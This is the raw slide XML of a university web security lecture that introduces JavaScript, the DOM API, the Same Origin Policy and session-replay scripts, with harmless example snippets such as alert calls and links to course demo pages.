              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the DOM API</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="0" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" b="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Same Origin Policy (SOP) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to rein it in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71576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Recall: dynamic web pages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Most web pages do not just contain static HTML, but are dynamic:   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>they contain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>executable content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 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endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0033C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38</a:t>
            </a:fld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267744" y="4581128"/>
            <a:ext cx="100811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508104" y="4581128"/>
            <a:ext cx="100811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436096" y="4869160"/>
            <a:ext cx="1080120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79912" y="2852936"/>
            <a:ext cx="30384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execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> aka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processing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thanks to</a:t>
            </a:r>
          </a:p>
          <a:p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client-side scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 2" descr="http://paolospaccamonti.com/prova-wordpress/wp-content/gallery/prova/generic-man.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect l="39624" t="11426" r="39624" b="14063"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="683568" y="3068960"/>
            <a:ext cx="1109609" cy="2763797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563888" y="4437112"/>
            <a:ext cx="1512168" cy="93610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 web browser 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948264" y="4437112"/>
            <a:ext cx="1584176" cy="72008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 Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>web server</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0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 flipH="1">
            <a:off x="3792217" y="3775050"/>
            <a:ext cx="1080120" cy="576064"/>
            <a:chOff x="3923928" y="2420888"/>
            <a:chExt cx="1008112" cy="576064"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Curved Down Arrow 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3923928" y="2420888"/>
              <a:ext cx="1008112" cy="576064"/>
            </a:xfrm>
            <a:prstGeom prst="curvedDownArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 25000"/>
                <a:gd name="adj2" fmla="val 67231"/>
                <a:gd name="adj3" fmla="val 2744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3995936" y="2636912"/>
              <a:ext cx="144016" cy="72008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499992" y="2564904"/>
              <a:ext cx="216025" cy="144016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3563888" y="4408832"/>
            <a:ext cx="1497423" cy="172296"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3333CC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1662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Languages for Dynamic Content</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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44763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JavaScript         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>part of HTML standard</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0033CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebAssembly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r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         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>          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Flash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Silverlight </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ActiveX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>....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33CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSS (Cascading Style Sheets) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>defines layout and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>colours</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of web page, headers, links, etc.      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>CSS is also part of HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Not quite execution, but can be abused</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>JavaScript is Turing-complete, CSS graphical effects are not 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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Right Brace 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2483768" y="1988840"/>
            <a:ext cx="144016" cy="1224136"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="2222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80658" y="1988840"/>
            <a:ext cx="2813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require a browser add-on, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="16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almost extinct</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008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16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2200" b="0" dirty="0"/>
              <a:t> Web Security </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="0" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" b="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="0" i="1" dirty="0"/>
              <a:t>Server &amp; client side</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400" b="0" i="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="0" dirty="0"/>
              <a:t> security risks</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400" b="0" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="4400" b="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>(esp. injection attacks)</a:t>
            </a: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endParaRPr lang="en-GB" sz="2700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JavaScript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31800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JavaScript is the leading language used in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill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client-side scripting </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="1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embedded in web page &amp; executed in the user's web browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="1" indent="-323850">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings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sz="1800" dirty="0"/>
              <a:t>reacting on events (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> keyboard)  and interacting with webpage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>NOTHING </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to do with Java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typical uses:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User interaction with the web page                                               </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> opening &amp; closing menus, providing a client-side editor for input, ...          </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript code can completely rewrite the contents of an HTML page without connecting to the web server!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Client-side input validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> has the user entered a correct date, valid s-number, syntactically correct email address or credit card number, or strong enough password?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NB such validation should not be security-critical, because malicious client can trivially by-pass it!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power of JavaScript: session replays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836712"/>
            <a:ext cx="8496944" cy="5519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/>
              <a:t>JavaScript can be used to record </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0"/>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>  user activity on a site,                                                 so that the entire session can be observed and replayed server-side.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600" dirty="0"/>
              <a:t>Example replay using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>FullStory</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0"/>
              <a:t>https://freedom-to-tinker.com/2017/11/15/no-boundaries-exfiltration-of-personal-data-by-session-replay-scripts/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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="user_replay_fullstory_demo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7928" y="1506677"/>
            <a:ext cx="7488832" cy="4212468"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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6FC8626-9F36-A011-5BC4-8B73217C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321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JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> 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68739"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Scripting language interpreted by browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" b="1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&lt;script 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type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1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javascript</a:t>
            </a:r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"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&gt; ... &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pP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                    </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Built-in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>functions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> to change content of the window          </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>       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&lt;script&gt; </a:t>
            </a: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alert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("Hello World!"); &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>You can define additional functions      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>        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&lt;script&gt; function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty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hi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(){alert("Hi!");}&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Built-in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>event handlers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> for reacting to user actions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1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&lt;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img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src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="pic.jpg" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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onMouseOver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="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>javascript:hi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()"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="19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800" dirty="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Code can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>inline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, as in examples above, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>in external file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>specified by URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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8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http://a.com/base.js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"&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Read HTML specs to see what should happen if you include both, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> in   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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&lt;script 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src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17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js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/base.js"&gt; alert("hi") &lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://www.cs.ru.nl/~erikpoll/websec/demo/demo_javascript.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NB try out example on this page &amp; look at the code (also for the exam)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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Brace 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3419872" y="237392"/>
            <a:ext cx="144016" cy="288032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9832" y="1683322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dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>optional </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1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88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DOM (Document Object Model)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dirty="0"/>
              <a:t>DOM is representation of the content of a webpage, in OO style</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200"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US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="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1800" dirty="0"/>
              <a:t>Webpage is a </a:t>
            </a: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document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  <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>object with various properties, such as</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="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   document.URL,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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document.referer</a:t>
            </a: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document.cookie</a:t>
            </a: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, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="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       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1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document.title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>and with all elements of the page as sub-objects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43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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752528" cy="2975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83475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DOM (Document Object Model)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JavaScript can interact with the DOM API provided by the browser</a:t>
            </a:r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2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>access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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>change</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> parts of the current webpage </a:t>
            </a:r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1800" dirty="0"/>
              <a:t>	incl. text, the URL, cookies, ....</a:t>
            </a:r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dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200"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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This gives JavaScript its real power!  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1800" dirty="0">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> it allows scripts to change layout and content of the webpage, open and menus in the webpage, open new tabs, change content in those tabs, ...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US" sz="1800" dirty="0">
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRP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1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Examples: 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1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://www.cs.ru.nl/~erikpoll/websec/demo/demo_DOM.html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1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>     http://www.cs.ru.nl/~erikpoll/websec/demo/demo_DOM2.html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r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NB try out this example &amp; look at the code for exam.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="569913" algn="l"/>
                <a:tab pos="1027113" algn="l"/>
                <a:tab pos="1484313" algn="l"/>
                <a:tab pos="1941513" algn="l"/>
                <a:tab pos="2398713" algn="l"/>
                <a:tab pos="2855913" algn="l"/>
                <a:tab pos="3313113" algn="l"/>
                <a:tab pos="3770313" algn="l"/>
                <a:tab pos="4227513" algn="l"/>
                <a:tab pos="4684713" algn="l"/>
                <a:tab pos="5141913" algn="l"/>
                <a:tab pos="5599113" algn="l"/>
                <a:tab pos="6056313" algn="l"/>
                <a:tab pos="6513513" algn="l"/>
                <a:tab pos="6970713" algn="l"/>
                <a:tab pos="7427913" algn="l"/>
                <a:tab pos="7885113" algn="l"/>
                <a:tab pos="8342313" algn="l"/>
                <a:tab pos="8799513" algn="l"/>
                <a:tab pos="9256713" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:cs typeface="Arial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60188C5-D1D1-4561-9898-B33054BADCB7}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"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44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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218500"/>
      </p:ext>
    </p:extLst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45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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499019" y="692696"/>
            <a:ext cx="8424936" cy="4641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Running downloaded code is a security risk!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
